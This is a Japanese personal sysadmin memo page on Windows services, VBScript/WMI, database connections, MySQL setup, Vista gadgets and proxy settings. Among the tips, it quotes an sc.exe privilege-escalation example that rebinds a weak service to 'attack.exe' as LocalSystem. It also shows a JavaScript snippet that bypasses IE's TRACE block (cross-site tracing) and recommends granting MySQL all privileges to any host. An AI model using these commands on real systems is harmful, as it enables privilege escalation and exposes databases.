メモ帖
間違いの指摘は  へ。※スパム排除の為 @yahoo.com,@hotmail.com は受信拒否しています。
         ↑きゃっとまーくめーるを利用させていただきました。

情報が多くなっていますので、検索は[Ctrl]+[F]で。(^^;
そのうち分類します…
修正している場合がるのでキャッシュから見ている場合は、ご注意を。

ここ
以下分離
DNS と ActiveDirectory 関連
Windows Server 2003 SP1 関連
リモートデスクトップ 関連
WSC 関連
SMTP 送信関連
IIS 関連
ASP 関連
VHD 仮想化関連

TOP


Windows2000でアプリケーションをサービス化 まず、instsrv.exeとsrvany.exeを入手する。 検索エンジンで調べると見つかると思います。 あるいは、サービスキットからインストールすることもできます。 試していませんが、Windows Server 2003 Resource Kit Tools にも含まれています。 次に、以下のコマンドを実行。   cd (instsrv.exeのあるフォルダ)   instsrv (ServiceName) (Full Path)\srvany.exe これで、空のサービスが作成されます。 そして、regedit.exeで   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\(ServiceName)\Parameters を見つけ、キー(Parameters)の追加を行う。 そのキーに以下の文字列を追加。   Application (アプリケーションのパス)   AppDirectory (アプリケーションのあるフォルダ) 最後に、[コントロールパネル]-[管理ツール]-[サービス]から 自分で作ったサービスを選択し、[開始]される。 instsrv.exe、srvany.exeと同等の機能として sexeというものもあります。
FireDaemon もありますが、一部のアンチウイルスでリスクウェアとして検出されます。
また、リソース キットに含まれている SC ツール (Sc.exe) を使用すると コマンド ラインからリモートでサービスを作成する事が出来るようです。 Sc.exe を使用して Windows サービスを作成する方法 svchost.exeプロセスとは?―― sc.exeでサービスをコマンドラインから制御する ――(@IT) tftpサービスを起動する で sc.exeを使った登録方法が詳解されています。 Windows Vista の場合で、Administrator アカウントでも登録できない(UAC が有効)場合は解除しておく必要がある。 コントロールパネル>ユーザアカウント>ユーザアカウント制限の有効化または無効化  >「ユーザアカウント制御(UAC)を使ってコンピュータの保護に役立たせる」を OFF にして再起動。   Windows Access Control Demystied   http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf    local SYSTEM 権限で attack.exe 追加。    $ sc config weakService binPath=c:\attack.exe obj=".\LocalSystem" password=""    $ sc stop weakService    $ sc start weakService    ってな事ができちゃうって話。 ※ SC.EXE でサービスに対応してないプログラムをサービス登録すると起動してすぐ停止しますのでご注意を。 サービスの登録を解除するツール Delete Server (delsrv.exe) Scriptomatic ツール WMI Administrative Tools Windows Management Insturmentation コマンド ライン (WMIC) ツール GUIを超えて進化するWindows管理ツール(2) ってなのも。 VBScript を使った 登録  仮想サービス Db.exe をインストールします。 Const OWN_PROCESS = 16 Const NOT_INTERACTIVE = False Const NORMAL_ERROR_CONTROL = 2 strComputer = "." Set objWMIService = GetObject("winmgmts:" & _ "{impersonationLevel=Impersonate}!\\" & strComputer & "\root\cimv2") Set objService = objWMIService.Get("Win32_BaseService") errReturn = objService.Create("DbService", _ "Personnel Database", _ "c:\windows\system32\db.exe", _ OWN_PROCESS, _ NORMAL_ERROR_CONTROL, _ "Manual", _ NOT_INTERACTIVE, _ "NT AUTHORITY\LocalService", "") Wscript.Echo errReturn Wmiprvse.exe プロセスは、 Windows Server 2003 を実行しているドメイン コントローラでの応答を停止します。 スプリクトセンターに揃っていますのでそちらから必要な物を見つけ出して下さい。 スプリクトセンター Hey, Scripting Guy! Scripting Eye for the GUI Guy(WMIのプロパティやメソッドを調べたい場合) Windows Management Instrumentation (WMI) : よく寄せられる質問 Windows Scripting Host Laboratory レジストリ キーの変更を監視する方法はありますか http://www.microsoft.com/japan/technet/scriptcenter/resources/qanda/jul05/hey0711.mspx Microsoft Windows レジストリの説明 http://support.microsoft.com/kb/256986 Win32 Classes http://msdn.microsoft.com/en-us/library/aa394084(VS.85).aspx タスクを使い定期的にプロセスを監視すると幸せになれるかも。 ちなみに、ATSchtasks コマンドを使っても登録できます。 タスク スケジューラの概要 タスクは、特定の Windows Server 2003 ベースのコンピュータで Schtasks コマンド ライン ツールを使用する月で実行されません。 非同期で監視する場合は Doctor Scripto のスクリプト ショップ: 非同期イベントの監視によるペストウェアの制御 をチェック。 サービスを自作する場合は  Windows サービスの作成  Visual Basic .NET または Visual Basic 2005 で Windows サービスのセットアップ プロジェクトを作成する方法 辺りを。 WScriptオブジェクトを利用する(1) これは、WSC にリンクした方がいいかな。 メモ帳 がタスクに無い場合、メモ帳を起動する Const strComputer = "." Const FileName = "notepad.exe" If ProcessCheck(FileName) = False Then Wscript.Echo ProcessCreate(FileName) End If Wscript.Quit 'プロセスチェック Function ProcessCheck(FN) Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & FN & "'") If colProcessList.Count=0 Then ProcessCheck = False Else ProcessCheck = True End If End Function 'プロセスの作成 Function ProcessCreate(FN) Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process") Error = objWMIService.Create(FN, null, null, intProcessID) ' ~~~~ ' ↑DLL(Dynamic Link Library)を呼び出すアプリケーションは、作業フォルダの指定をしないとアプリケーションが起動できない場合があります。 If Error = 0 Then '起動成功 ProcessCreate = intProcessID Else '起動失敗 ProcessCreate = False End If End Function WMI の クラスは http://msdn.microsoft.com/en-us/library/aa394375(VS.85).aspx で確認。 アクティブ化して SendKey でキーコマンドを送りたい場合は http://www.atmarkit.co.jp/fwin2k/tutor/cformwsh14/cformwsh14_01.html を参考に。 WSH から MOM にしたい場合は http://www.microsoft.com/japan/technet/scriptcenter/topics/mom/mom1.mspx を参考に。 Visual Basic Scripting Edition VBScript のステートメント http://msdn.microsoft.com/library/ja/script56/html/vsstmExecuteGlobal.asp Windows 2003 用の Windows Script 5.6 http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=887fce82-e3f5-4289-a5e3-6cbb818623aa Windows 2000 および Windows XP 用の Windows Script 5.6 http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=c717d943-7e4b-4622-86eb-95a22b832caa Windows 98、Windows Millennium Edition (Windows Me)、および Windows NT 4.0 用の Windows Script 5.6 http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=0a8a18f6-249c-4a72-bfcf-fc6af26dc390 Windows Script VBScript(MSDN) VBScript ランゲージ リファレンス 注意 Windows 2000 でスケジュールされたタスクを削除すると、エラー メッセージ "Cannot delete this scheduled job" が表示される Windows Script 5.6 をアップデートすると、Windows Update Web サイトでダウンロードが停止またはフリーズする Microsoft VBScript/JScript Script Decoding Buffer Overflow [MS10-022] Visual Basic Scripting (VBScript) 5.8 セキュリティ更新プログラム (2010 年 4 月 13 日) について  いつからか不明だけど、ダブルクォートの取り扱いがおかしい・・・  Chr(34) でも、消されるってどういうことよ。  ダブルクオート以降の文字列が消されるバグについて    再現  Set typeLib = Wscript.CreateObject("Scriptlet.TypeLib")  GUID = typeLib.Guid  Wscript.Echo Chr(34) & GUID & Chr(34)  Wscript.Echo """" & GUID & """"  正規表現でダブルクオートを含んだ置き換えを行った場合も。  HTML = "<img src=""http://..."">以降の文字列"  Set objRE = New RegExp  objRE.Global = True  objRE.IgnoreCase = True  objRE.Pattern = "src=""(.*?)""" Set Match = objRE.Execute(HTML) HTML = objRE.Replace(HTML, "src=""cid:@_" & GUID & """") ↑タイプライブラリが入ると駄目っぽい Wscript.Echo HTML  原因  GUIDは40文字で文字列として受け取った場合、目に見えるのは38文字。  最後に 00- がくっ付いており、以降が NULL として処理されるため。    回避方法  38文字目までで抜き出す。 Left(typeLib.Guid, 38) そのた Microsoft Script Debugger 1.0 Vbsedit 3.3    [HOWTO] Windows 2000 で特定の Windows プログラムの実行を制限する方法 WSH を始めよう(@IT) Windows管理者のためのWindows Script Host入門(@IT) WMIを使うスクリプトを簡単に作成する 次世代Windowsシェル「Windows PowerShell」を試す(前編)  Scripting with Windows PowerShell  Windows PowerShell  WSHとの比較で知るPowerShell Windows PowerShell宣言! (単行本)(アマゾン) スプリクトの実行環境  スプリクト言語  ・VBScript 拡張子は .vbs  ・JScript 拡張子は .js  ※ Java Script とは別物。    LL(ライトウェイト・ランゲージ)の 4 大言語  ・Perl 拡張子は .ps  ※ 利用するには ActivePerl が必要。                 http://www.activestate.com/  ・PHP   拡張子は .php ※ 利用するには ActiveScript 用の DLL (php5activescript.dll) が必要。                 http://www.php.gr.jp/                 MS、Windowsサーバ上でのPHP環境サポートでZendと提携                 http://www.itmedia.co.jp/enterprise/articles/0611/01/news023.html  ・Python  拡張子は .pys ※ 利用するには ActivePython が必要                 http://www.activestate.com/                 [IIS]IIS で python スプリクトを使用する  ・Ruby   拡張子は .rb  ※ 利用するには ActiveScript Ruby が必要。                 http://www.geocities.co.jp/SiliconValley-PaloAlto/9251/ruby/  IIS から利用する場合に「FastCGI for IIS」を利用すると高速化されるようです。 http://www.iis.net/  これを利用する事により CGI プログラムのプロセスをメモリ上に常駐させ、要求ごとのプロセスの起動、終了のオーバーヘッドをなくす事が出来ます。  IIS5.1 以降のバージョンで利用可能。(64bit版あり)  セットアップ方法は IIS 関連 に書く予定。 特定のサービスを再起動(VBS) Dim WshShell Dim objWMIService, colServices, objService Dim errReturnCode Const ServiceName = "Service" Set objWMIService = GetObject("winmgmts:"_ & "{impersonationLevel=impersonate}!\\.\root\cimv2") Set colServices = objWMIService.ExecQuery _ ("Select * from Win32_Service where Name='" & ServiceName & "'") For each objService in colServices '自動開始サービスの停止 errReturnCode = objService.StopService() Wscript.Sleep 20000 '停止状態にある自動開始サービスの再開 objService.StartService() Next 'イベントログに書き込み Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.LogEvent 16, ServiceName & "を再起動しました。" Set WshShell = Nothing  ※イベントログのメッセージに 「 % 」を含んだ文字列を出力できない
タスクを使って VBS を起動した場合に表示される コマンドライン コンソール の消し方(2003 Server) C:\VBS\TEST.VBS が本体とする。 下記を TEST.WSH で保存し、これをタスクに登録する。 ---------------------- [ScriptFile] Path=C:\VBS\TEST.VBS [Options] Timeout=0 DisplayLogo=0 ---------------------- ※スプリクトファイルを右クリックすると、プロパティに「スプリクト」という項目があります。  WSH はそこで設定すると自動で作られます。 2000 や XP は .VBS のプロパティのスプリクトタブの中に、「コマンドコンソールでのスプリクト実行時にロゴを表示する」のチェックをはずせば OK 上記ファイルが作られます。 あと。  コンピュータの管理(マイコンピュータを右クリックのメニューから管理を選択)の  パフォーマンス ログと警告、サービスからも特定のプログラムを実行したりできます。
Wscript.Echo を実行するとコマンドプロンプトで結果が表示される場合   VBS ファイルの関連付けが Wscript.exe から CScript.exe に変更されているとそうなるようです。   ファイルの種類から、vbs をチェックしてみましょう。      詳細設定を開いて「新規」を選択し   アクション:実行(Wscript)   アクションを実行するアプリケーション:c:\Windows\system32\Wscript.exe "%1" %* を追加すれば、VBSファイルの右クリックで、「実行(Wscript)」が追加されているはずです。   ちなみに CScript.exe で実行したい場合も同様に   アクション:実行(Wscript)   アクションを実行するアプリケーション:c:\Windows\system32\Cscript.exe "%1" %* を追加すれば、VBSファイルの右クリックで、「実行(Cscript)」が追加されているはずです。   ※ファイルのパスは環境に合わせて変更すること。   Cscript を利用する場合は StdIn, StdOut, StdErr の各プロパティを利用した   標準入力、標準出力、標準エラー出力が利用できます。 例) For i=1 To 10 WScript.StdOut.Write(".") WScript.Sleep 100 Next wait.vbs で保存した場合は、コマンドシェルから cscript wait.vbs で動作確認できます。   参考   http://www.atmarkit.co.jp/fwin2k/operation/wsh03/wsh03_03.html コマンド シェルの概要   デフォルトを切り替えるにはコマンドプロンプトから    c:\>cscript //H:CScript //S   または    c:\>cscript //H:WScript //S   Windows Script 5.7 for Windows XP   http://www.microsoft.com/downloads/details.aspx?FamilyID=47809025-D896-482E-A0D6-524E7E844D81&displaylang=en   Windows スクリプト 5.7 の Windows XP の説明   http://support.microsoft.com/kb/952830   Windows Script 5.7 for Windows Server 2003   http://www.microsoft.com/downloads/details.aspx?FamilyID=f00cb8c0-32e9-411d-a896-f2cd5ef21eb4&displaylang=en   ※CScript と WScript を切り替えるコマンドが逆になってます。(バグ)   Windows および Windows Server の CScript コマンドで既定のスクリプト ホストが変更できない   http://support.microsoft.com/kb/981847
タスク スケジューラ に自動登録する。 とりあえず、こなへん。 Task Scheduler Using VBScript http://www.microsoft.com/downloads/details.aspx?FamilyID=601d75e2-f907-4e51-ad88-adb818df1d27&DisplayLang=en   Windows 7 または Windows Server 2008 R2 の一部のタスク設定を変更した後、スケジュールされたタスクの構成ページを呼び出すアプリケーションがクラッシュします。   http://support.microsoft.com/kb/981710   Schtasks.exe コマンド ライン ツールを使用してタスクの有効化を行うと、タスクが複数回実行される   http://support2.microsoft.com/kb/3032133
壊れたMDBファイルを修復するには アメリカのMSのホームページにjetcompという修復ソフトがあります。 access2000,97は修復出来ます。 [AC97] 破壊したデータベースの修復方法 破損した Jet 4.0 データベースの Access 2000 でのトラブルシューティングと修復の方法 [ACC2002] Jet 4.0 の使用時にデータベースの破損を最小限に抑える方法 Microsoft Jet 4.0 データベース エンジン用の最新の Service Pack の入手方法 ダウンロード センターで入手可能な Microsoft Jet 4.0 Service Pack 8 レプリケーション ファイルの更新版 ※ Opportunistic Lock を無効にすると壊れにくくなるようです。 Windows で Opportunistic Lock を構成する OOo を使ってみるのもいいかも。    多数の不具合を改善したOpenOffice.org 2.0.2日本語版公開,CD起動版も   http://itpro.nikkeibp.co.jp/article/NEWS/20060403/234346/   「OpenOffice.org Base」はMicrosoft Accessの代わりにはならない (1/2)   http://www.itmedia.co.jp/enterprise/articles/0810/22/news079.html
リンク先のHTMLソースを表示してみる view-source:http://www.netdive.jp/のように、URLのまえにview-source:をつけてURLを指定すると、そのHTMLソースが表示されます。 最近は出来ないようで・・・(ファイアフォックスでは有効) 確認用にソースを表示する物をつくってみました。 ※適当につくっていますので、たまに反応しなくなります。 そのうち下記の実験も出来る様に拡張するよてい。       メソッド 機能 HTTP/0.9 GET URIで指定したリソースを取得します。 HTTP/1.0 HEAD URIで指定したリソースのレスポンスヘッダのみを取得します。 HTTP/1.0 POST URIで指定したサーバーのコマンドに対してデーターを転送します。 HTTP/1.1 PUT URIで指定したリソースを、転送するデータで置き換えます。 HTTP/1.1 DELETE URIで指定したりソースを削除します。 HTTP/1.1 OPTIONS 使用できるメソッドやオプションの一覧を取得します。 HTTP/1.1 TRACE サーバーやプロクシの動作を診断するための情報を返答します。 HTTP/1.1 CONNECT プロクシをトンネルに切り替えます。 HTTP/1.1 PATCH HTTP/1.1 LINK HTTP/1.1 UNLINK  If-Modified-Since 更新されたかどうかを調べる ヘッダ。  If-Modified-Since: Sun, 26 Jun 2005 12:00:00 GMT  もし、コンテンツファイルが更新されていなければ、サーバーはその旨を  304 Not Modified  というレスポンスヘッダを返す。(コンテンツのデータは返しません。)  付けなかった場合は、  HTTP/1.1 200 OK  が返ります。  も調べるようにしたいなぁ・・・   Fiddler で HTTP プロトコル解析が出来るので必要ないや。。。   URLTracer http://research.microsoft.com/URLTracer/ てのも。   Fiddler は Web テストのオーサリングおよびデバッグの技法 でも紹介されてますね。    Fiddlerプラグイン Watcher クロスドメインの確認が出来る。    http://blogs.msdn.com/sdl/archive/2009/04/16/watcher-a-new-web-security-testing-tool.aspx    第2回 リクエストをいじれば脆弱性の仕組みが見えるのだ!    http://www.atmarkit.co.jp/fsecurity/rensai/httpbasic02/httpbasic01.html   IE7Pro を入れると動的に更新されたソースの確認が出来るので、それとセットで入れておくと便利かも。    適当に作っているものに Whois も在ったりするんだけど、、、これも、作り直したほうがよさげ。  ちなみに Whois の問い合わせは ポート 43 に IP 投げる。  telnet の場合は telnet whois.apnic.net 43 で接続後に IPアドレスを打ち込んでえんたー。  ※これは、kojikoji.net の下の方に実装しました。接続した IP 情報を表示するだけですけどね...  用語「Cross Site Tracing」@鳩丸ぐろっさり (用語集)  http://bakera.jp/hatomaru.aspx/glossary/00430072006f0073007300200053006900740065002000540072006100630069006e0067  # HTTP/1.1 の TRACE を使った攻撃についての説明  ログを見てると、OPTIONS や TRACE が飛んできてますねぇ…  IIS6.0 も URLScan 入れておいた方がいいかも。  Windows Server 2003 + IIS6.0 で URLScan2.5 を導入する方法は下のほうで書いてます。  ※IE 6.0 SP2になって XmlHttpRequest オブジェクトでの TRACE のサポートを、こっそり取り除いたようですが   クライアントサイドで XmlHttpRequest の TRACE コマンドが利用出来ないかというと先頭に改行コードを埋め込む事で   回避できちゃうみたいです。だめじゃん。    var x = new ActiveXObject("Microsoft.XMLHTTP");    x.open("\r\nTRACE","/",false);    x.setRequestHeader("Max-Forwards","0");    x.send();    alert(x.responseText);
●互換モードを使う WIndows95か、WindowsNT4.0 SP5互換として動作させる方法です。  設定するにはServicePace2が導入されている必要が有ります。   やり方は簡単で、c:\winnt\apppatch\slayerui.dll をレジストリに登録して、再起動するだけです。   regsvr32 %systemroot%\apppatch\slayerui.dll   ↑こんな感じで登録します。   互換性モードを設定したいアプリケーションのショートカットなどのプロパティを参照し   「Compatibility」タブをクリックする。「互換モードで実行する」にチェックを入れれば   Windows95かWindowsNT4.0 SP5互換として利用可能となります。 ●OS情報をごまかす  Windows 2000のシステムCD-ROM内の「SUPPORT」フォルダにある APCOMPAT.EXE をクリックすると、それらしいものが起動します。  設定出来るのは   Windows 2000   Windows NT4 SP3   Windows NT4 SP4   WIndows NT4 SP5   Windows98   Windows95  です。 Windows Server 2003 で互換モード テクノロジを使用する方法 http://support.microsoft.com/kb/324265/ja Windows Server 2003 でプログラム互換性ウィザードを使用する方法 http://support.microsoft.com/kb/317517/ja
Microsoft OLE DB Provider for SQL Server での接続方法 Windows認証では Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=データベース名;Data Source=サーバー名 SQL認証では Provider=SQLOLEDB.1;Password=パスワード;Persist Security Info=True;User ID=ユーザID;Initial Catalog=データベース名;Data Source=サーバー名 Persist Security Info を true または yes に設定すると、ユーザー ID やパスワードなどのセキュリティ関連情報は 接続を開いた後も接続から取得できるのでセキュリティを向上させるには、Persist Security Info を false にしておく。 Persist Security Info は、既定では false に設定されている。 TCP/1433 以外での接続は接続文字列に "Server=ComputerName, PortNumber" を含める。 [PRB] 1433 以外のポートで SQL Server に接続できない [HOW TO] 名前付きパイプを経由した Microsoft SQL Server への接続 [HOW TO] 信頼関係接続を使用して別々のコンピュータ上の IIS と SQL Server を接続する方法 Oracle Provider=MSDAORA.1;Data Source=path to database on server MySQL は ODBC http://www.mysql.com/downloads/api-myodbc-3.51.html .Open "DRIVER={MySQL ODBC 3.51 Driver};SERVER=localhost;Port=3306;Uid=root;Password=;Database=test;"  ※ 接続できれば、ACCESS からの利用も可能です。    詳しくは ODBC によるMySQLの操作 http://www.tryhp.net/ODBCMySQL.htm Microsoft インデックス サービス Provider=MSIDXS.1;Data Source=path to file この辺りを参考に データ ソースにアクセスする [MDAC/SQL Server]SQL Server/MSDE の認証における問題解決方法 第 4 章 SQL Server 2000 のユーザーと権限 〜 SQL Server 一年生 - データベース基礎編 - 〜 リモートからSQL Server 2000にアクセスできない? SQL Server 2000 の Kerberos サポート 2000 から 2003 Server にアップグレードした場合に SQL Server と通信出来なくなる事があるようで Oledb32.dll バージョンの相違による物との事。 Windows 2000 から Windows Server 2003 へオペレーティング システムをアップグレードする場合、 Oledb32.dll ファイルがアップグレードされていません。 MDAC のバージョンチェック。。。 How to check for MDAC version http://support.microsoft.com/kb/301202 各 DB の接続ポート SQL Server TCP/1433 Oracle   TCP/1526 MySQL    TCP/3306 PostgreSQL TCP/5432
MySQL4.0 の設定 ■MySQL サービス開始  winmysqladmin.exe を実行 ■日本語の設定 my.ini [mysqld] basedir=c:\mysql datadir=c:\mysql\data language=c:/mysql/share/japanese default-character-set=sjis [mysql] default-character-set=sjis [mysql-dump] default-character-set=sjis [client] default-character-set=sjis ※ winmysqladmin.exe の my.ini Setup タグから変更可能。 ■外部から接続出来る設定 コマンドプロンプトから rootユーザでmysqlに接続  mysql -u root パスワードが掛かっている場合は mysql -u root -p パスワード  C:\mysql\bin>mysql -u root  Welcome to the MySQL monitor. Commands end with ; or \g.  Your MySQL connection id is 72 to server version: 4.0.26-nt  Type 'help;' or '\h' for help. Type '\c' to clear the buffer.  mysql> この後、以下の2つのコマンドを実行する。 GRANT ALL PRIVILEGES ON *.* TO [ユーザID]@"%" IDENTIFIED BY '[パスワード]' WITH GRANT OPTION; GRANT ALL PRIVILEGES ON *.* TO [ユーザID]@localhost IDENTIFIED BY '[パスワード]' WITH GRANT OPTION; ※ユーザIDとパスワードには任意の値を入力 VARCHAR(1024) あら、出来ないのね… 255までですか、そうですか。。。 BLOB で解決?LOGTEXT でいいのか。 InnoDB トランザクション可能なテーブル型。行ロックを行うならば必須 MyISAM 非トランザクションテーブル INDEX ORDER BY するキーを設定しておく。 付けると早くなる。 http://dev.mysql.com/doc/refman/4.1/ja/create-index.html クエリキャッシュ無効  SELECT SQL_NO_CACHE * FROM 1度しか発行しないから無効化しとくべきか… 参考  http://homepage2.nifty.com/sak/w_sak3/doc/sysbrd/mysql_01.htm  http://pc.okwave.jp/kotaeru.php3?q=1283428  http://question.woman.excite.co.jp/kotaeru.php3?q=1908753  http://www.limy.org/program/db/mysql/index.html ツール  かねやんMySQLAdmin  http://www.mmdb.net/m_kaneko/  Common SQL Environment  http://www.vector.co.jp/soft/win95/business/se180732.html  MySQL-Front 安価な商用アプリケーション(30日の試用期間がある)  http://www.mysqlfront.de/ Set RS = CreateObject("ADODB.Recordset") RS.CursorType = 3 RS.CursorLocation = 2 RS.LockType = 2 RS.MaxRecord = 1 RS.Open "SELECT * FROM T_TEST", DB あれれ、レコードロックされてなさげ… ああ、行単位でロック出来ないのね、、、 MySQL4.0 をアンインストール  アプリケーションの追加と削除から 削除すると、サービスが残ったままになるので  C:\mysql\bin\>mysqld-max-nt --remove MySQL  を実行してから、削除する。  参考  http://www.s-m-l.org/dev/mysql_php.html  http://golgotha.xrea.jp/archives/2005/09/ JOIN で発行されるデータがで大量の場合は join_buffer を増やすと良いらしい。 遅いので最適化を考える。。。 WEBサーバ ・HTTP圧縮してデータ量を減らす。 ・不要なHTTPレスポンスヘッダーは消す。 ・滅多に更新されない静的なデータはキャッシュコントロール。(.CSSとか.HTMLとか) ・リンク切れのチェック。 ・404エラーページの表示の最適化。 ・画像データだけ分離して別サーバに置く。(TCPコネクション数が減る)CSS を使って url(data:image/png;base64;...)てな方法も。詳しくはデータスキームで検索 ・KeepAlive は OFF にする。(アクセス数が多い場合有効)   もっとも複数のサーバがあって、TCP コネクション数が少ない場合は ON がいい ・サブネット化してブロードキャストパケットを制限 DB ・MySQL の 「インデックス」と「NOT NULL制約」を正しく設計しているか。。 ・コネクションプールは適切か。 ・lock のかかり方は正しいか。(SQL Server は select の度にロックされる) ・DB のチューニング。 ハードウェアなら、ディスクアクセスに関しては SCSI に変えるだけで転送速度が倍にはなる。 133 > 320  変わりつつあるようだけど。   サーバ内蔵ハードディスクの最新トレンド(2006年版)   http://www.atmarkit.co.jp/fsys/kaisetsu/070server_hdd2006/server_hdd2006.html MySQLの常識を知りセットアップしてJSPからDB操作 (1/3) - @IT http://www.atmarkit.co.jp/fjava/rensai4/webjousiki08/webjousiki08_1.html マイクロソフト、「MySQL」から「SQL Server」への移行ツールを公開 http://japan.zdnet.com/sp/feature/07microsoft/story/0,3800083079,20406451,00.htm
Vista の新機能の一つで特徴的な物にガジェットがあります。 ガジェットは、JScript, JavaScript, CSS, DHTML などの Web ページを応用した物で作成されています。 ガジェットを格納するフォルダ c:\ユーザー\[username]\AppData\Local\Microsoft\Windows Sidebar\Gadgets ※AppData は隠し属性になっています。 ガジェットを構成するファイル sample.gadget ※フォルダ .gadget で終わらせる事。 gadget.xml  マニフェストファイル名         ※Windows は gadget.xml に記録された情報を元にガジェットを認識し          そのガジェットを「ガジェットギャラリー」に追加します。 sample.html 配布する場合は、上記のファイルを ZIP 圧縮し、拡張子を .gadget に変更する。 gadget.xml------------------------------------------------------- <?xml version="1.0" encoding="utf-8" ?> <gadget> <name>sample gadget</name> <version>1.0.0.0</version> <icons> <icon height="270px" width="201px" src="sample.jpg" /> </icons> <hosts> <host name="sidebar"> <base type="HTML" src="sample.html" /> <permissions>Full</permissions> <platform minPlatformVersion="1.0" /> </host> </hosts> </gadget> ----------------------------------------------------------------- encoding="utf-8" としているので、保存時は必ず utf-8 にする事。 ルート要素は <gadget> で必ず、子要素として <name>, <version>, <hosts> が必要。 <name> 要素には、ガジェットギャラリーに表示される名前 <version> 要素には、ガジェットのバージョンを記述(バージョンは 4 桁までで 0-9 の値) <icons> 要素は必須ではなく属性も無い。子要素に <icon> があり、その src 属性に ガジェットギャラリーに表示する画像ファイルを指定する。(jpg, gif, png で ico は確か正しく動作しないので注意) height、width属性には、その画像サイズの縦横幅を指定。 <hosts> 要素は、必ず一つ以上の <host> 要素を持つ。 <hosts> 要素自体には属性は無い。 <host> 要素の name 属性には必ず「sidebar」を指定する。 <base> 要素には、type、src 属性が必要で type 属性にはガジェットのファイルの種類 src 属性にはファイル名(ここでは sample.html)を指定する。 <permissions> 要素は、必ず「Full」と指定。 <platform> 要素の minPlatformVersion 属性にはガジェットを実行する為に必要な Windows サイドバーの最小バージョンを指定する。(現時点では 1.0) 他に使える要素については http://msdn2.microsoft.com/en-us/library/aa965879.aspx sample.html 適当になんか作成で…  40,000個以上のアイコンをシンプルなインターフェースで検索できる『iconlet』  http://www.popxpop.com/archives/2007/06/40000iconlet.html Windows Vistaガジェットプログラミング (単行本) (アマゾン) ※ Windows Presentation Foundation (WPF) も下の方に少し。
MSXML で PROXY を利用したい コマンドプロンプトで、「proxycfg.exe」を利用すると出来ます。  proxycfg.exe -p proxy.sphere.ad.jp:8080 "<local>" 実行した場合は下記メッセージが出ます。 更新されたプロキシ設定 現在の WinHTTP プロキシ設定: HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\ WinHttpSettings : プロキシ サーバー: proxy.sphere.ad.jp:8080 バイパス一覧 : <local> 解除は  proxycfg -d ※ Windows Update もこの設定で通信するようになるので注意。 プロキシ サーバーを使用する環境にて Windows Update を実行すると通信エラーが発生する [WU] Windows Update で利用するプロキシについて Windows Server 2003、Windows XP、Windows 2000 用のバックグラウンド インテリジェント転送サービス (BITS) 2.0 および WinHTTP 5.1 を含む更新プログラム パッケージ バックグラウンド インテリジェンス転送サービス(Word) 現在 Windows Server 2003 と Windows XP のバックグラウンド インテリジェント転送サービス(BITS)の更新パッケージが利用できます。  ・カスタム HTTP ヘッダーのサポート。  ・証明書ベースのクライアント認証が安全な HTTP トランスポートに役立つサポート。  ・バージョン 6(IPv6)の IP をサポートします。  ・強化されたアップロード パフォーマンス。 MSXML4.0 SP2をインストールするとProxycfg.exeが追加されますが MSXML 4.0 Service Pack 2 (Microsoft XML Core Services) Proxycfg.exe についてはバグ(と言うかファイルが無い)があった気がするので(このサイトの何処かに書いた気がする。。。)探してください。 MSXML6.0 が公開されてます。  Microsoft Core XML Services (MSXML) 6.0  http://www.microsoft.com/downloads/details.aspx?familyid=993c0bcf-3bcf-4009-be21-27e85e1857b1&displaylang=en   Microsoft XML Core Services 6.0 RTM の脆弱性により、リモートでコードが実行される可能性がある (925673)   http://www.microsoft.com/downloads/details.aspx?FamilyID=fd513435-fa6d-407c-bedc-5fd03e5b7d6c&DisplayLang=ja  Microsoft XML パーサーのバージョン一覧  http://support.microsoft.com/default.aspx?scid=kb;ja;269238  XML  http://www.microsoft.com/japan/msdn/xml/default.asp PRB:「プロキシ認証が必要」の ServerXMLHTTP オブジェクトのエラー メッセージ http://support.microsoft.com/kb/315909/ja 一般的なプロキシサーバのポート TCP/1080 TCP/3128 TCP/8000 TCP/8080 TCP/8088 TCP/10080 代表的な well-known ポート 20 FTP(データ転送) 21 FTP(制御) 23 Telnet 25 SMTP 53 DNS 80 HTTP 110 POP3 119 NNTP(Network News) 123 NTP(Network Time) VISTA 以降では  netsh winhttp show proxy  設定  netsh winhttp set proxy proxy-server=IPアドレス:ポート番号  IEの設定を利用  netsh winhttp import proxy source=ie
INSERT 後に Autonumber フィールドの値を取得する方法 @@IDENTITY を利用する事で取得可能です。 "SELECT @@IDENTITY AS オートナンバーフィールド" ※この操作を実行できるのは、Jet 4.0 OLE DB プロバイダおよび Microsoft Access 2000 以降だけです。   ASP で vartype 14(10進数)が帰ってくるようになった?   CONVERT(int,@@IDENTITY) にしないと駄目っぽい。 CREATE PROCEDURE InsertCategory @CategoryName nchar(15), @Identity int OUT AS INSERT INTO Categories (CategoryName) VALUES(@CategoryName) SET @Identity = SCOPE_IDENTITY() ID 値および Autonumber 値の取得 SQL Server 2005 の場合は OUTPUT が利用できるみたい。 http://msdn2.microsoft.com/ja-jp/library/ms177564.aspx INSERT table OUTPUT tableID INTO tDATE VALUES (GETDATE()); こんな感じ?
Active Server Pages で SQL Server にアクセスする方法 Active Server Pages で SQL Server にアクセスする方法 を参考に。
ADO で SQL Server のストアド プロシージャの値を取得 ここを参考に。 ADO で SQL Server のストアド プロシージャの値を取得する方法
ASP から SQL Server のストアド プロシージャを呼び出す方法 ここを参考に。 ASP から SQL Server のストアド プロシージャを呼び出す方法 こっちで少し書いています。
SQL Server データベースのトランザクション ログが突然拡張されないようにする方法 ここを参考に。 SQL Server データベースのトランザクション ログが突然拡張されないようにする方法 [INF] SQL Server でトランザクション ログが予期しない大きさになるか、いっぱいになる
SQL Server 2000 のインストールに失敗した時の正しいアンインストール方法 ここを参考に。 SQL Server 2000 の既定のインスタンス、名前付きインスタンス、または仮想インスタンスを手動でアンインストールする方法
